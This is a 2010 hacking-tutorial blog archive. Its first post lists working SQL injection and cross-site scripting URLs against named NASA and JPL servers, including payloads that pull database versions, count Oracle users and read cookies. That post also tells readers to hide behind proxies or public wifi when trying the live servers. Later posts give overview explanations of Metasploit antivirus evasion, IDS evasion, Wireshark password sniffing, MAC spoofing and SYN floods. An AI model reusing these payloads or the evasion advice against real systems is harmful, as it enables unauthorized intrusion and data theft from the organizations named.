Thursday, February 25, 2010

NASA Servers "0-day" Vulnerabilities

After a series of SQL vulnerabilities last December 2009, the NASA website is on the security limelight again with another set of server vulnerabilities. I am aware that the agency itself has had budget issues lately and added the fact that they have a lot of servers to maintain on a daily basis, may have contributed to such negligence. However, all that should not be used as an excuse for the security oversight. After all, prevention such as input validation should not cost a single cent right?



Cross-Site Scripting / SQL :

http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=%27&node=0&instnname=0′AND+1/0;–&Submit=Search

Following error is giving some precious information (I mean many times it is returning different IP address in “Remote Address”. These IP addresses can be of other error generating remote clients, there might be some serious flaw:

http://www-pds.jpl.nasa.gov/tools/search.jsp?q=NOT
http://www-pds.jpl.nasa.gov/tools/text-search/results.jsp?query=%22
http://www-pds.jpl.nasa.gov/tools/data-search/search.jsp?q=OR
http://www-pds.jpl.nasa.gov/tools/data-search/search.jsp?q=”
etc.

Check these results of this Error based SQL injection:
http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=%27&node=1′%22;/*&instnname=-1;–&Submit=Search
http://www-pds.jpl.nasa.gov/tools/ddlookup/data_dictionary_lookup.cfm?type=element&q=NOT&genclasstype=0′&sysclassid=0

http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=&node=1&instnname=%27%29+OR+1=0+OR+57=rand%28convert%28%27NUMERIC,%27||%28select+@@version%29%29%252b900000000000000000000000%29–&Submit=Search
http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=&node=1&instnname=’)+OR+1=0+OR+57=rand(convert(‘NUMERIC,’||(select+@@version))%252b900000000000000000000000)–&Submit=Search
————————————————————————————————————————————————–
Error Executing Database Query.
Syntax error during explicit conversion of VARCHAR value ‘ Adaptive Server Enterprise/12.5.1/EBF 11429/P/Linux Intel/Enterprise Linux/ase1251/1823/32-bit/OPT/Tue Sep 16 23:43:54 2003′ to a NUMERIC field.

http://sbir.nasa.gov/sbirweb/abstracts/search_result.jsp?program=&phase=&progyr=99&st=&center=&firm=’select+@@version–’&sort=&sort2=&rec_per_page=1&cur_page=-2&start_page=-9999

http://sbir.nasa.gov/sbirweb/abstracts/search_result.jsp?program=SBIR&phase=&progyr=99st=center=firm=SBIR’or+1=utl_inaddr.get_host_address((select+concat(‘A’,count(username))+from+all_users))–’&sort=null&sort2=null&rec_per_page=100&cur_page=1&start_page=1

http://e4eil01u.ecs.nasa.gov:22000/WebAccess/drill?attrib=home%3Cscript%3Ealert(‘XSS–vinnu’)%3C/script%3E&next=group

http://www.igpp.ucla.edu/cgi-bin/ditdos?filter=GOPR_2001,HAL_,DS1_PEPE,DSPE&title=Comet
————————————————————————————————————————————————
http://directreadout.sci.gsfc.nasa.gov/index.cfm?section=home%22%3E%3Cscript%3Ealert(‘XSS–%5C%22vinnu%5C%22′)%3C/scrip
t%3E&page=news
http://ssd.jpl.nasa.gov/sbdb_help.cgi?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


Safety Reminders :

1. The information above are for educational purposes only and should not be used for illegal purposes such as defacing, information theft, espionage, and the like.
2. Most of the vulnerabilities above are not yet fixed by NASA, so take extra precaution if you have to check the live servers yourself such as using multiple proxies or simply use public internet access such as a "wifi hotspot".
3. I have tried to notify the people in charge via email before posting these vulnerabilities but no reply from them until now for 2 weeks already.
4. Credits to Lox and Vinay.

Monday, February 22, 2010

Metasploit Meterpreter Reverse EXE



The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.
The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
Metasploit was created in 2003 as a portable network game using the Perl scripting language. Later, the Metasploit Framework was then completely rewritten in the Ruby programming language. It is most notable for releasing some of the most technically sophisticated exploits to public security vulnerabilities. In addition, it is a powerful tool for third party security researchers to investigate potential vulnerabilities. On October 21, 2009 the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.
Like comparable commercial products such as Immunity's CANVAS or Core Security Technologies' Core Impact, Metasploit can be used to test the vulnerability of computer systems in order to protect them, and it can be used to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities.
Metasploit's emerging position as the de facto vulnerability development framework has led in recent times to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk, and remediation of that particular bug. Metasploit 3.0 (Ruby language) is also beginning to include fuzzing tools, to discover software vulnerabilities in the first instance, rather than merely writing exploits for currently public bugs. This new avenue has been seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November, 2006.

Friday, February 19, 2010

Bypassing Anti-Virus Using Metasploit



This video shows how to bypass anti virus tools utilizing the new tricks in Metasploit 3.2

Monday, February 15, 2010

Fragroute



One basic technique is to split the attack payload into multiple small packets, so that the IDS must reassemble the packet stream to detect the attack. A simple way of splitting packets is by fragmenting them, but an adversary can also simply craft packets with small payloads. The 'whisker' evasion tool calls crafting packets with small payloads 'session splicing'.
By itself, small packets will not evade any IDS that reassembles packet streams. However, small packets can be further modified in order to complicate reassembly and detection. One evasion technique is to pause between sending parts of the attack, hoping that the IDS will time out before the target computer does. A second evasion technique is to send the packets out of order, confusing simple packet re-assemblers but not the target computer.

Thursday, February 11, 2010

Hping



hping is a free packet generator and analyzer for the TCP/IP protocol distributed by Salvatore Sanfilippo (also known as Antirez). Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.

Tuesday, February 9, 2010

NSA.gov Hacked : Epic Fail

I usually dislike and disagree to people who deface websites to state whatever point they want to prove but this one is really an exception. The defacement happened last October 2009 and was kept silent from the general public. This simply proves the poor state of IT security from supposedly one of the most security-knowledgeable agency in the entire planet. How does this happen you may ask? The security industry itself is filled with pretenders with fancy resumes and certifications who actually know almost next to none when it comes to real-world security threats. Otherwise, how do you explain being compromised with an 8-year old exploit which any newbie hacker can readily do?

Monday, February 8, 2010

How Password Crackers Work



Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords. On a file-by file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.

Sunday, February 7, 2010

Bypassing Firewalls Using SSH Tunneling



An SSH tunnel consists of an encrypted tunnel created through an SSH protocol connection. Users may set up SSH tunnels to tunnel unencrypted traffic over a network through an encrypted channel. For example, Windows machines can share files using the SMB protocol, a non-encrypted protocol. If one were to mount a Microsoft Windows file-system remotely through the Internet, someone snooping on the connection could see transferred files. To mount the Windows file-system securely, one can establish an SSH tunnel that routes all SMB traffic to the remote fileserver through an encrypted channel. Even though the SMB protocol itself contains no encryption, the encrypted SSH channel through which it travels offers security.
To set up an SSH tunnel, one configures an SSH client to forward a specified local port to a port on the remote machine. Once the SSH tunnel has been established, the user can connect to the specified local port to access the network service. The local port need not have the same port number as the remote port.
SSH tunnels provide a means to bypass firewalls that prohibit certain Internet services — so long as a site allows outgoing connections. For example, an organization may prohibit a user from accessing Internet web pages (port 80) directly without passing through the organization's proxy filter (which provides the organization with a means of monitoring and controlling what the user sees through the web). But users may not wish to have their web traffic monitored or blocked by the organization's proxy filter. If users can connect to an external SSH server, they can create an SSH tunnel to forward a given port on their local machine to port 80 on a remote web server. To access the remote web server users would point their browser to http://localhost/.
Some SSH clients support dynamic port forwarding that allows the user to create a SOCKS 4/5 proxy. In this case users can configure their applications to use their local SOCKS proxy server. This gives more flexibility than creating an SSH tunnel to a single port as previously described. SOCKS can free the user from the limitations of connecting only to a predefined remote port and server.

Saturday, February 6, 2010

Top Ten Web Hacking Techniques of 2008

Top Ten Hacks of 2007

Hacking Intranet Websites from the Outside


Cybercrime in the Middle East on the rise

Beirut (RPN) - Data protection and IT security is of increasing concern in the Middle East, where current research reveals an alarming upswing in cybercrime, with Saudi Arabia, the UAE, and Egypt topping the list as the most vulnerable to malicious internet attacks.
Internet security experts have classified the MENA region as one of the most vulnerable in the world to internet crime.  As one of the world’s fastest growing economic hubs and a region where business activity is characterized by an explosion of corporate data, protecting sensitive information is becoming a vital concern from legal, financial, and economic perspectives. 
Johnny Karam is the MENA region director for Symantec, an internet security firm.  In an interview with RPN, he emphasized the growing threats presented by the increasingly sophisticated activity of cybercriminals. 
"Cybercrime is certainly on the rise in the MENA region, and has spawned an underground economy, so to speak, where the goods traded include credit card information, active bank account details, and full-blown identities,” Karam said. 
This is an organized environment, where specialists are recruited for their ability to hack or phish for information.   Depending on its country of origin and other specifics, full credit card details – including acct number, full name, expiry date and security code, might sell for between 1 and ten dollars.  Full active bank account information can be purchased for as little as ten dollars.
Symantec’s research for 2008 ranked Egypt the most vulnerable of 230 countries sampled in terms of vulnerability to malicious acts, including virus transmission, hacking, spamming, and phishing.  Lebanon ranked 93. 
But Karam warns against the assumption that malicious activity originates only from outside the business being targeted, emphasizing a link between tough economic conditions and the upswing in cybercrime:
"With the difficult economic climate, many businesses are looking at the need to downsize.  They face the risk of information diversion as staff is downsized.  Confidential data may be diverted, either intentionally, or unintentionally.  The direct financial losses can be huge, as can the loss to a company’s brand name its customer list, or its advantage over competitors,” he explains.

Read more at : http://www.rpnnews.com/Story.aspx?StoryID=2046

Intrusion Detection Definitions



Firewall and Perimeter Security

US bill seeks cybersecurity scholarships : Send your kid to hacker school

The US House of Representatives has overwhelmingly passed a bill that would direct almost $400m toward research designed to shore up the nation's cyber security defenses.
The Cybersecurity Enhancement Act would authorize $108.7m over five years to establish a cybersecurity scholarship program. In return, students would serve in federal government posts upon graduation.


Read More at http://www.theregister.co.uk/2010/02/04/house_cybersecurity_bill/

Thursday, February 4, 2010

Data Mining Using Wireshark



Data mining is the process of extracting patterns from data. Data mining is becoming an increasingly important tool to transform these data into information. It is commonly used in a wide range of profiling practices, such as marketing, surveillance, fraud detection and scientific discovery.
Data mining can be used to uncover patterns in data but is often carried out only on samples of data. The mining process will be ineffective if the samples are not a good representation of the larger body of data. Data mining cannot show up patterns that may be present in the larger body of data if those patterns are not present in the sample being "mined". Inability to find patterns may become a cause for some disputes between customers and service providers. Therefore data mining is not fool proof but may be useful if sufficiently representative data samples are collected. The discovery of a particular pattern in a particular set of data does not necessarily mean that a pattern is found elsewhere in the larger data from which that sample was drawn. An important part of the process is the verification and validation of patterns on other samples of data.
The term data mining has also been used to describe data dredging and data snooping. However, dredging and snooping can be (and sometimes are) used as exploratory tools when developing and clarifying hypotheses.

Cookies and Grabbing Passwords with Wireshark



In this post, I will take you a little more deeper and introduce to the process of grabbing Cookies and Passwords using WireShark. As already known, WireShark is a Network Packet Analyzing tool which can be used to grab and analyze the various network packets passing through the Network Interface. This even includes Cookies and Passwords passing through the network interface card.In short, As HTTP is a stateless protocol, Cookies are one of the ways used to maintain browser state. Once a Cookie has been set on a domain and a specific path, it is echoed back in every subsequent request to the domain and path combination.
1.) Start WireShark and set a filter for HTTP results.
2.) In order to set a cookie, Navigate to http://httprecipes.com/1/2/cookies.php and click on the link “Set Cookie”. You will be asked to enter a value to the cookie. Enter “pinoysecurity” (without quotes) and press Set. This will set the cookie test-cookie with a value “pinoysecurity”.
3.) In WireShark, select the appropriate row with data to and from domain httprecipes.com. Lookout for Set-Cookie in HyperText Transmission Protocol.
4.) Passwords, passed as cleartext can also be grabbed easily using WireShark.

Introduction To Wireshark



Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.
Wireshark is cross-platform, using the GTK+ widget tool-kit to implement its user interface, and using pcap to capture packets; it runs on various Unix-like operating systems including Linux, Mac OS X, BSD, and Solaris, and on Microsoft Windows. Released under the terms of the GNU General Public License, Wireshark is free software.

How To Spoof Your MAC Address



MAC Spoofing is a technique of changing an assigned Media Access Control (MAC) address of a networked device to a different one. The changing of the assigned MAC address may allow the bypassing of access control lists on servers or routers, either hiding a computer on a network or allowing it to impersonate another computer.
MAC spoofing is the activity of altering the MAC address of a network card.

SYN Flood - Denial of Service




A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system.
When a client attempts to start a TCP connection to a server, the client and server exchange a series of messages which normally runs like this:
  1. The client requests a connection by sending a SYN (synchronize) message to the server.
  2. The server acknowledges this request by sending SYN-ACK back to the client.
  3. The client responds with an ACK, and the connection is established.
This is called the TCP three-way handshake, and is the foundation for every connection established using the TCP protocol.
The SYN flood is a well known type of attack and is generally not effective against modern networks. It works if a server allocates resources after receiving a SYN, but before it has received the ACK.
There are two methods, but both involve the server not receiving the ACK. A malicious client can skip sending this last ACK message. Or by spoofing the source IP address in the SYN, it makes the server send the SYN-ACK to the falsified IP address, and thus never receive the ACK. In both cases the server will wait for the acknowledgement for some time, as simple network congestion could also be the cause of the missing ACK.
If these half-open connections bind resources on the server, it may be possible to take up all these resources by flooding the server with SYN messages. Once all resources set aside for half-open connections are reserved, no new connections (legitimate or not) can be made, resulting in denial of service. Some systems may malfunction badly or even crash if other operating system functions are starved of resources this way.
The technology often used in 1996 for allocating resources for half open TCP connections involved a queue which was often very short (e.g., 8 entries long) with each entry of the queue being removed upon a completed connection, or upon expiry (e.g., after 3 minutes). When the queue was full, further connections failed. With the examples above, all further connections would be prevented for 3 minutes by sending a total of 8 packets. A well-timed 8 packets every 3 minutes would prevent all further TCP connections from completing. This allowed for a Denial of Service attack with very minimal traffic.
SYN cookies provide protection against the SYN flood by eliminating the resources allocated on the target host.
Limiting new connections per source per time frame is not a general solution since the attacker can spoof the packets to have multiple sources.
Reflector routers can also be used as attackers, instead of client machines.
Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security